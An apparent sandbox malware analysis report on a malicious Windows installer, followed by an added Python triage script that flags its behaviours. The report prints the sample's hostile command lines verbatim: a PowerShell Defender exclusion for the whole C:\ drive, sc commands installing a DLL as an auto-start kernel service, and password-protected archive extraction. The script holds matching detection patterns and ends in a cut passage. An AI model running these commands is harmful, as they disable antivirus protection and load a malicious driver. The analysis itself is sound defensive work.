                                  Process:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe
                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):3366912
                                  Entropy (8bit):6.530548291878271
                                  Encrypted:false
                                  SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                                  MD5:9902FA6D39184B87AED7D94A037912D8
                                  SHA1:F5D8470ACF5DFF81C6D3364A8943B24E3DB48D95
                                  SHA-256:43D9F1FA3BDA81C618CC23FBB4E9D8551305AF0090A3D452C4070F938F6BCFAC
                                  SHA-512:BC97E2C379C464F821AF0E38630DB65165F4E91A1105A3C7DABCC5E61CC9EAAB1522AC82E749AA4FEFC5A9E21A295A0A59CFE99D6BC3980F9C89F00AF5B8CF75
                                  Malicious:true
                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                                  Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                  File Type:ASCII text, with CRLF, CR line terminators
                                  Category:dropped
                                  Size (bytes):406
                                  Entropy (8bit):5.117520345541057
                                  Encrypted:false
                                  SSDEEP:6:AMpUMcvtFHcAxXF2SaioBGWOSTIPAiTVHsCgN/J2+ebVcdsvUGrFfpap1tNSK6n:pCXVZRwXkWDThGHs/JldsvhJA1tNS9n
                                  MD5:9200058492BCA8F9D88B4877F842C148
                                  SHA1:EED69748A26CFAF769EF589F395A162E87005B36
                                  SHA-256:BAFB8C87BCB80E77FF659D7B8152145866D8BD67D202624515721CBF38BA8745
                                  SHA-512:312AB0CBA3151B3CE424198C0855EEE39CC06FC8271E3D49134F00D7E09407964F31D3107169479CE4F8FD85D20BBD3F5309D3052849021954CD46A0B723F2A9
                                  Malicious:false
                                  Preview:..7-Zip (a) 23.01 (x86) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20....Scanning the drive for archives:.. 0M Scan. .1 file, 31890 bytes (32 KiB)....Extracting archive: locale3.dat..--..Path = locale3.dat..Type = 7z..Physical Size = 31890..Headers Size = 354..Method = LZMA2:16 LZMA:16 BCJ2 7zAES..Solid = -..Blocks = 1.... 0%. .Everything is Ok....Size: 63640..Compressed: 31890..
                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Entropy (8bit):7.921220316367972
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 98.04%
                                  • Inno Setup installer (109748/4) 1.08%
                                  • InstallShield setup (43055/19) 0.42%
                                  • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                  • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                  File name:#U5b89#U88c5#U52a9#U624b_1.0.9.exe
                                  File size:5'707'684 bytes
                                  MD5:ff430c30f7b9f0550f6b68dcc709c55b
                                  SHA1:a47d3d79a05d232d45aadd14045765521cfd8431
                                  SHA256:6a11d0ca2303bffe42e568f32c1adefd70742379ce2639f2ee2a437051ac9c13
                                  SHA512:44cc03072673a2a2953899e75f0445d11cb3a005a4dd43091ab2fac27517ab2661562dca1a4b96c515d2a7c33d56b91fea5c98e2b7e5cbf3d1134ca69eb6da0b
                                  SSDEEP:98304:XwREoZqR+RuRmr4qNb1R088uArvgOv5EcNQ+DidMwZgf:lvRz1qNz/ts
                                  TLSH:3A461213F2CBE43EF0591B3715B2B15895FB6A606823AE1696ECB4ACCF350601D3E647
                                  File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                  Icon Hash:0c0c2d33ceec80aa
                                  Entrypoint:0x4a83bc
                                  Entrypoint Section:.itext
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:6
                                  OS Version Minor:1
                                  File Version Major:6
                                  File Version Minor:1
                                  Subsystem Version Major:6
                                  Subsystem Version Minor:1
                                  Import Hash:40ab50289f7ef5fae60801f88d4541fc
                                  Instruction
                                  push ebp
                                  mov ebp, esp
                                  add esp, FFFFFFA4h
                                  push ebx
                                  push esi
                                  push edi
                                  xor eax, eax
                                  mov dword ptr [ebp-3Ch], eax
                                  mov dword ptr [ebp-40h], eax
                                  mov dword ptr [ebp-5Ch], eax
                                  mov dword ptr [ebp-30h], eax
                                  mov dword ptr [ebp-38h], eax
                                  mov dword ptr [ebp-34h], eax
                                  mov dword ptr [ebp-2Ch], eax
                                  mov dword ptr [ebp-28h], eax
                                  mov dword ptr [ebp-14h], eax
                                  mov eax, 004A2EBCh
                                  call 00007F0090DA3EC5h
                                  xor eax, eax
                                  push ebp
                                  push 004A8AC1h
                                  push dword ptr fs:[eax]
                                  mov dword ptr fs:[eax], esp
                                  xor edx, edx
                                  push ebp
                                  push 004A8A7Bh
                                  push dword ptr fs:[edx]
                                  mov dword ptr fs:[edx], esp
                                  mov eax, dword ptr [004B0634h]
                                  call 00007F0090E3584Bh
                                  call 00007F0090E3539Eh
                                  lea edx, dword ptr [ebp-14h]
                                  xor eax, eax
                                  call 00007F0090E30078h
                                  mov edx, dword ptr [ebp-14h]
                                  mov eax, 004B41F4h
                                  call 00007F0090D9DF73h
                                  push 00000002h
                                  push 00000000h
                                  push 00000001h
                                  mov ecx, dword ptr [004B41F4h]
                                  mov dl, 01h
                                  mov eax, dword ptr [0049CD14h]
                                  call 00007F0090E313A3h
                                  mov dword ptr [004B41F8h], eax
                                  xor edx, edx
                                  push ebp
                                  push 004A8A27h
                                  push dword ptr fs:[edx]
                                  mov dword ptr fs:[edx], esp
                                  call 00007F0090E358D3h
                                  mov dword ptr [004B4200h], eax
                                  mov eax, dword ptr [004B4200h]
                                  cmp dword ptr [eax+0Ch], 01h
                                  jne 00007F0090E3C5BAh
                                  mov eax, dword ptr [004B4200h]
                                  mov edx, 00000028h
                                  call 00007F0090E31C98h
                                  mov edx, dword ptr [004B4200h]
                                  Name | Virtual Address | Virtual Size | Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT | 0xb7000 | 0x71 | .edata
                                  IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb5000 | 0xfec | .idata
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xcb000 | 0x11000 | .rsrc
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xba000 | 0x10fa8 | .reloc
                                  IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_TLS | 0xb9000 | 0x18 | .rdata
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_IAT | 0xb52d4 | 0x25c | .idata
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0xb6000 | 0x1a4 | .didata
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                  Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                  .text | 0x1000 | 0xa568c | 0xa5800 | b889d302f6fc48a904de33d8d947ae80 | False | 0.3620185045317221 | data | 6.377190161826806 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  .itext | 0xa7000 | 0x1b64 | 0x1c00 | 588dd0a8ab499300d3701cbd11b017d9 | False | 0.548828125 | data | 6.109264411030635 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  .data | 0xa9000 | 0x3838 | 0x3a00 | 5c0c76e77aef52ebc6702430837ccb6e | False | 0.35338092672413796 | data | 4.95916338709992 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .bss | 0xad000 | 0x7258 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .idata | 0xb5000 | 0xfec | 0x1000 | 627340dff539ef99048969aa4824fb2d | False | 0.380615234375 | data | 5.020404933181373 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .didata | 0xb6000 | 0x1a4 | 0x200 | fd11c1109737963cc6cb7258063abfd6 | False | 0.34765625 | data | 2.729290535217263 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .edata | 0xb7000 | 0x71 | 0x200 | 7de8ca0c7a61668a728fd3a88dc0942d | False | 0.1796875 | data | 1.305578535725827 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .tls | 0xb8000 | 0x18 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .rdata | 0xb9000 | 0x5d | 0x200 | d84006640084dc9f74a07c2ff9c7d656 | False | 0.189453125 | data | 1.3892750148744617 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .reloc | 0xba000 | 0x10fa8 | 0x11000 | a85fda2741bd9417695daa5fc5a9d7a5 | False | 0.5789579503676471 | data | 6.709466460182023 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                  .rsrc | 0xcb000 | 0x11000 | 0x11000 | a38d03cb2f026a0f99883dd9fce161db | False | 0.18785903033088236 | data | 3.7213085960795746 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                  RT_ICON | 0xcb678 | 0xa68 | Device independent bitmap graphic, 64 x 128 x 4, image size 2048 | English | United States | 0.1174924924924925
                                  RT_ICON | 0xcc0e0 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States | 0.15792682926829268
                                  RT_ICON | 0xcc748 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.23387096774193547
                                  RT_ICON | 0xcca30 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.39864864864864863
                                  RT_ICON | 0xccb58 | 0x1628 | Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colors | English | United States | 0.08339210155148095
                                  RT_ICON | 0xce180 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.1023454157782516
                                  RT_ICON | 0xcf028 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.10649819494584838
                                  RT_ICON | 0xcf8d0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.10838150289017341
                                  RT_ICON | 0xcfe38 | 0x12e5 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.8712011577424024
                                  RT_ICON | 0xd1120 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.05668398677373642
                                  RT_ICON | 0xd5348 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.08475103734439834
                                  RT_ICON | 0xd78f0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.09920262664165103
                                  RT_ICON | 0xd8998 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.2047872340425532
                                  RT_STRING | 0xd8e00 | 0x3f8 | data | | | 0.3198818897637795
                                  RT_STRING | 0xd91f8 | 0x2dc | data | | | 0.36475409836065575
                                  RT_STRING | 0xd94d4 | 0x430 | data | | | 0.40578358208955223
                                  RT_STRING | 0xd9904 | 0x44c | data | | | 0.38636363636363635
                                  RT_STRING | 0xd9d50 | 0x2d4 | data | | | 0.39226519337016574
                                  RT_STRING | 0xda024 | 0xb8 | data | | | 0.6467391304347826
                                  RT_STRING | 0xda0dc | 0x9c | data | | | 0.6410256410256411
                                  RT_STRING | 0xda178 | 0x374 | data | | | 0.4230769230769231
                                  RT_STRING | 0xda4ec | 0x398 | data | | | 0.3358695652173913
                                  RT_STRING | 0xda884 | 0x368 | data | | | 0.3795871559633027
                                  RT_STRING | 0xdabec | 0x2a4 | data | | | 0.4275147928994083
                                  RT_RCDATA | 0xdae90 | 0x10 | data | | | 1.5
                                  RT_RCDATA | 0xdaea0 | 0x310 | data | | | 0.6173469387755102
                                  RT_RCDATA | 0xdb1b0 | 0x2c | data | | | 1.1590909090909092
                                  RT_GROUP_ICON | 0xdb1dc | 0xbc | data | English | United States | 0.6170212765957447
                                  RT_VERSION | 0xdb298 | 0x584 | data | English | United States | 0.2804532577903683
                                  RT_MANIFEST | 0xdb81c | 0x7a8 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3377551020408163
                                  DLL | Import
                                  kernel32.dll | GetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                                  comctl32.dll | InitCommonControls
                                  user32.dll | CreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                                  oleaut32.dll | SysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                                  advapi32.dll | ConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey
                                  Name | Ordinal | Address
                                  __dbk_fcall_wrapper | 2 | 0x40fc10
                                  dbkFCallWrapperAddr | 1 | 0x4b063c
                                  Language of compilation system | Country where language is spoken
                                  English | United States
                                  No network behavior found

                                  Target ID:0
                                  Start time:23:17:25
                                  Start date:22/12/2024
                                  Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe"
                                  Imagebase:0x6b0000
                                  File size:5'707'684 bytes
                                  MD5 hash:FF430C30F7B9F0550F6B68DCC709C55B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:Borland Delphi
                                  Reputation:low
                                  Has exited:true

                                  Target ID:1
                                  Start time:23:17:25
                                  Start date:22/12/2024
                                  Path:C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp" /SL5="$20456,4753292,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe"
                                  Imagebase:0xd40000
                                  File size:3'366'912 bytes
                                  MD5 hash:9902FA6D39184B87AED7D94A037912D8
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:Borland Delphi
                                  Reputation:low
                                  Has exited:true

                                  Target ID:2
                                  Start time:23:17:26
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:"powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
                                  Imagebase:0x7ff788560000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:3
                                  Start time:23:17:26
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:4
                                  Start time:23:17:29
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                  Imagebase:0x7ff693ab0000
                                  File size:496'640 bytes
                                  MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                  Has elevated privileges:true
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:false

                                  Target ID:5
                                  Start time:23:17:34
                                  Start date:22/12/2024
                                  Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe" /VERYSILENT
                                  Imagebase:0x6b0000
                                  File size:5'707'684 bytes
                                  MD5 hash:FF430C30F7B9F0550F6B68DCC709C55B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:Borland Delphi
                                  Reputation:low
                                  Has exited:false

                                  Target ID:6
                                  Start time:23:17:35
                                  Start date:22/12/2024
                                  Path:C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp" /SL5="$40272,4753292,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe" /VERYSILENT
                                  Imagebase:0xb0000
                                  File size:3'366'912 bytes
                                  MD5 hash:9902FA6D39184B87AED7D94A037912D8
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:Borland Delphi
                                  Reputation:low
                                  Has exited:true

                                  Target ID:7
                                  Start time:23:17:37
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                                  Imagebase:0x7ff65a080000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:8
                                  Start time:23:17:37
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                                  Imagebase:0x7ff76b340000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:9
                                  Start time:23:17:37
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:10
                                  Start time:23:17:37
                                  Start date:22/12/2024
                                  Path:C:\Program Files (x86)\Windows NT\7zr.exe
                                  Wow64 process (32bit):true
                                  Commandline:7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
                                  Imagebase:0x9f0000
                                  File size:831'200 bytes
                                  MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Antivirus matches:
                                  • Detection: 0%, ReversingLabs
                                  Has exited:true

                                  Target ID:11
                                  Start time:23:17:37
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:12
                                  Start time:23:17:38
                                  Start date:22/12/2024
                                  Path:C:\Program Files (x86)\Windows NT\7zr.exe
                                  Wow64 process (32bit):true
                                  Commandline:7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
                                  Imagebase:0x9f0000
                                  File size:831'200 bytes
                                  MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:13
                                  Start time:23:17:38
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:14
                                  Start time:23:17:38
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd /c start sc start CleverSoar
                                  Imagebase:0x7ff65a080000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:15
                                  Start time:23:17:38
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc start CleverSoar
                                  Imagebase:0x7ff76b340000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true
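
The records above form one chain: a Defender exclusion for the whole `C:\` volume, an `sc create ... type= kernel start= auto` that registers a `.dll` under `C:\Program Files (x86)\Windows NT` as a kernel driver, two password-protected archives unpacked with `7zr.exe` (the `-p` switch puts the password on the command line, so it is recoverable from the process record), and then a burst of `sc start CleverSoar` calls. The following is an added triage script, not part of the Joe Sandbox report or the sample: it runs those four checks over a constructed list of (image, command line) pairs copied from the records above. The pair format, the rule names and the start-count threshold are assumptions of the example, not a Joe Sandbox export format.

```python
import re
from collections import Counter

# Constructed sample input: the command lines from the process list above as
# (image name, command line) pairs. This tuple format is an assumption of this
# example, not a format the sandbox exports.
SAMPLE = [
    ("powershell.exe", "\"powershell.exe\" -Command \"Add-MpPreference -ExclusionPath 'C:\\'\""),
    ("cmd.exe", 'cmd /c start sc create CleverSoar displayname= CleverSoar binPath= '
                '"C:\\Program Files (x86)\\Windows NT\\tProtect.dll" type= kernel start= auto'),
    ("sc.exe", 'sc create CleverSoar displayname= CleverSoar binPath= '
               '"C:\\Program Files (x86)\\Windows NT\\tProtect.dll" type= kernel start= auto'),
    ("7zr.exe", "7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald"),
    ("7zr.exe", "7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs"),
] + [("cmd.exe", "cmd /c start sc start CleverSoar"), ("sc.exe", "sc start CleverSoar")] * 10

# sc.exe syntax is `key= value`; values with spaces are double-quoted.
SC_KV_RE = re.compile(r'(\w+)=\s*(?:"([^"]*)"|(\S+))')
EXCLUSION_RE = re.compile(r"-Exclusion(Path|Process|Extension)\s+['\"]?([^'\"\s]+)", re.I)
DRIVER_DIR = "c:\\windows\\system32\\drivers\\"


def parse_sc_create(cmd):
    """Return name/binpath/type/start for an `sc create` line, or None otherwise."""
    m = re.search(r"\bsc(?:\.exe)?\s+create\s+(\S+)", cmd, re.I)
    if not m:
        return None
    kv = {k.lower(): (q if q else u) for k, q, u in SC_KV_RE.findall(cmd)}
    return {"name": m.group(1), "binpath": kv.get("binpath", ""),
            "type": kv.get("type", "").lower(), "start": kv.get("start", "").lower()}


def kernel_driver_findings(cmd):
    """Reasons a kernel-type service registration looks wrong, if it is one."""
    svc = parse_sc_create(cmd)
    if not svc or svc["type"] != "kernel":
        return []
    path = svc["binpath"].lower()
    reasons = []
    if not path.endswith(".sys"):
        reasons.append("driver image does not use the .sys extension")
    if not path.startswith(DRIVER_DIR):
        reasons.append("driver image is outside %SystemRoot%\\System32\\drivers")
    return reasons


def exclusion_findings(cmd):
    """Flag Add-MpPreference exclusions; a bare drive letter disables scanning of the volume."""
    m = EXCLUSION_RE.search(cmd)
    if not m:
        return []
    kind, value = m.group(1), m.group(2)
    if kind.lower() == "path" and re.fullmatch(r"[a-z]:\\?", value, re.I):
        return [f"Defender exclusion covers an entire volume: {value}"]
    return [f"Defender {kind} exclusion added: {value}"]


def archive_password(cmd):
    """Return (archive, password) for a 7-Zip extract/expand that passes -p<pw> inline."""
    parts = cmd.split()
    if len(parts) < 2 or not re.match(r"7z[ra]?(\.exe)?$", parts[0], re.I):
        return None
    if parts[1].lower() not in ("x", "e"):
        return None
    pw = next((p[2:] for p in parts[2:] if p.startswith("-p") and len(p) > 2), None)
    archive = next((p for p in parts[2:] if not p.startswith("-")), None)
    if pw is None or archive is None:
        return None
    return archive, pw


def analyze(records, start_threshold=3):
    """Run all checks; returns (rule, image, detail) tuples. Threshold is an assumption."""
    findings = []
    start_counts = Counter()
    for image, cmd in records:
        for r in exclusion_findings(cmd):
            findings.append(("defender_exclusion", image, r))
        for r in kernel_driver_findings(cmd):
            findings.append(("kernel_service", image, r))
        hit = archive_password(cmd)
        if hit:
            findings.append(("password_archive", image, f"{hit[0]} password={hit[1]}"))
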